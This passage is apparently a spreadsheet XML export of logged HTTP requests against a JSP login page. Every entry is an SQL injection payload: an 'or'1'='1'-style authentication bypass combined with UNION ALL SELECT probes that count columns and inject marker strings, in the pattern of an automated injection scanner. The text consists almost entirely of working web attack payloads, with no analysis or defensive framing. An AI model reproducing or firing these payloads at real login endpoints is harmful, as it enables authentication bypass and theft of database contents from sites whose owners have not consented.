    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721,9721#and'kaxm'='kaxm&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198,9198#and'ttvn'='ttvn&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925,6925#and'kcyh'='kcyh&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196,4196#and'qbsn'='qbsn&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550,3550#and'tewk'='tewk&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904,5904#and'lgfn'='lgfn&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215,5215#and'dbwn'='dbwn&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98,98#and'bqkx'='bqkx&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521,3521#and'awph'='awph&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846,6846#and'ufgd'='ufgd&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull--and'gucg'='gucg&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null--and'uxza'='uxza&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null--and'orsp'='orsp&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null--and'mfky'='mfky&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null--and'khgj'='khgj&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null--and'eedg'='eedg&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null--and'nskb'='nskb&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null--and'byni'='byni&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null--and'iess'='iess&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null--and'cjco'='cjco&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectconcat(char(58,114,116,109,58),ifnull(cast(char(100,82,67,80,104,73,79,81,115,100)aschar),char(32)),char(58,101,107,121,58))--and'ubro'='ubro&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=-8345'unionallselectconcat(char(58,114,116,109,58),ifnull(cast(char(105,76,119,84,122,118,70,85,88,107)aschar),char(32)),char(58,101,107,121,58))--and'halm'='halm&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect1511--and'kzvw'='kzvw&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5066,5066--and'zfjo'='zfjo&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7064,7064,7064--and'llbm'='llbm&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3081,3081,3081,3081--and'fnek'='fnek&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3270,3270,3270,3270,3270--and'njic'='njic&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect2436,2436,2436,2436,2436,2436--and'hcix'='hcix&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6549,6549,6549,6549,6549,6549,6549--and'oagd'='oagd&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect636,636,636,636,636,636,636,636--and'jaaw'='jaaw&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4602,4602,4602,4602,4602,4602,4602,4602,4602--and'cqlq'='cqlq&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8151,8151,8151,8151,8151,8151,8151,8151,8151,8151--and'mivu'='mivu&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectconcat(char(58,114,116,109,58),ifnull(cast(char(86,65,120,77,90,97,69,80,100,80)aschar),char(32)),char(58,101,107,121,58))--and'ukyp'='ukyp&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=-6506'unionallselectconcat(char(58,114,116,109,58),ifnull(cast(char(71,66,122,82,78,98,66,74,103,87)aschar),char(32)),char(58,101,107,121,58))--and'aymz'='aymz&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null--and'uqck'='uqck&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and'jrjo'='jrjo&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and'wlez'='wlez&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and'jhsv'='jhsv&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'jucd'='jucd&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'izou'='izou&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'hxnr'='hxnr&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'legg'='legg&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'dtdp'='dtdp&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'pvzq'='pvzq&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect1022,1022,1022,1022,1022,1022,1022,1022,1022,1022,1022--and'ojza'='ojza&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092,5092--and'gyta'='gyta&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711,4711--and'culu'='culu&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306,6306--and'nuek'='nuek&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8759,8759,8759,8759,8759,8759,8759,8759,8759,8759,8759,8759,8759,8759,8759--and'mirv'='mirv&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect9090,9090,9090,9090,9090,9090,9090,9090,9090,9090,9090,9090,9090,9090,9090,9090--and'yjrj'='yjrj&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017,2017--and'kiyx'='kiyx&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235,5235--and'fumj'='fumj&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4518,4518,4518,4518,4518,4518,4518,4518,4518,4518,4518,4518,4518,4518,4518,4518,4518,4518,4518--and'odrk'='odrk&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108,3108--and'grmy'='grmy&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'xfst'='xfst&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'lruc'='lruc&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'stkn'='stkn&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'ccbr'='ccbr&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'wqwo'='wqwo&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'cgmk'='cgmk&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'dybt'='dybt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--and'mgwe'='mgwe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--and'ssmy'='ssmy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--and'lpjx'='lpjx&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028,4028--and'hixg'='hixg&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335,5335--and'ujkb'='ujkb&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242,7242--and'ufcg'='ufcg&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963,2963--and'nfhl'='nfhl&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898,7898--and'nrzf'='nrzf&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785,8785--and'pjno'='pjno&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140,4140--and'ihtf'='ihtf&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028,7028--and'ieyb'='ieyb&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319,3319--and'xnjy'='xnjy&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329,1329--and'xcsl'='xcsl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--and'saoe'='saoe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--and'hhir'='hhir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--and'vdmh'='vdmh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--and'gdiu'='gdiu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--and'trpr'='trpr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--and'bjnp'='bjnp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--and'ackb'='ackb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--and'npzu'='npzu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--and'sgso'='sgso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--and'kajo'='kajo&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119,8119--and'nicb'='nicb&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836--and'agfa'='agfa&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757,7757--and'uxti'='uxti&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490,3490--and'oinc'='oinc&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920,920--and'bbde'='bbde&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188,3188--and'qqpt'='qqpt&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688,4688--and'rknw'='rknw&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774,8774--and'xlwv'='xlwv&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486,2486--and'zxam'='zxam&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845,845--and'pgtu'='pgtu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--and'rmfu'='rmfu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--and'shuv'='shuv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--and'wbda'='wbda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--and'lwlm'='lwlm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--and'szdu'='szdu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--and'eiin'='eiin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,null--and'luqc'='luqc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,null,null--and'sbio'='sbio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,null,null,null--and'lkkl'='lkkl&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'vysh'='vysh&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703,2703--and'zmsf'='zmsf&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410,410--and'qxmh'='qxmh&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033,5033--and'wtoo'='wtoo&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706,7706--and'tzvd'='tzvd&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23--and'fbno'='fbno&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891,6891--and'rbcv'='rbcv&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986,1986--and'upmp'='upmp&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131,8131--and'lwlc'='lwlc&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398,3398--and'dhfv'='dhfv&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.'unionallselect6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945,6945--and'vtrw'='vtrw&amp;remember=&amp;modo=entrar</t>
  </si>
  <si>
